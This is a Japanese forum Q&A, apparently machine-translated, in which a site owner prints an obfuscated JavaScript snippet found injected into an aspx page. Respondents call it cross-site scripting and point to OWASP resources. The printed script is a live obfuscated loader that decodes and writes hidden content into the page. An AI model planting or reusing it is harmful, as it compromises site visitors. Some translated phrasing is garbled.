コードが挿入されています

Question

今日私は自分のサイトがダウンしていることがわかりました...私はエラーをオフにし、エラーを追跡しました。 aspxページの一番下にいくつかのコードが追加されていることが判明しました。（下記のコードを見つけてください）。明らかに、コードには、私のaspxページが許さなかったいくつかのhtmlタグがありました。エラーが発生しました。

誰かが私のaspxページにコードを挿入することができる抜け穴があるかもしれないことを確認しなければならないsceneriosを知りませんか？

<html> 
<body> 
<script> 
var a=''; 
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m '; 
var c='5314869720'; 
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i); 
document.writeln(unescape(a)); 
</script> 
</body>  
</html> 

Answer 1

私にはcross-site scripting (XSS)のようです。 SQLインジェクション直後の＃2最も一般的な攻撃です。

あなたの経験や背景はわかりませんが、あなたがXSSを認識しておらず、あなたがウェブデベロッパーである場合は、私は強くお勧めします。 OWASPは素晴らしいリソースです。

XSSはあなたのウェブサイトに行く人に影響を与えるだけでなく、CSRF (Cross-Site Request Forgery)のおかげでXSSは視聴者がログインしているattack on other websitesに利用できるので、あなたとあなたのウェブサイトだけでなく他の人も同様に影響します。

Answer 2

はいダビデは権利である...あなたはこのことができますPrevent Cross-Site Scripting

希望を読み始めることが...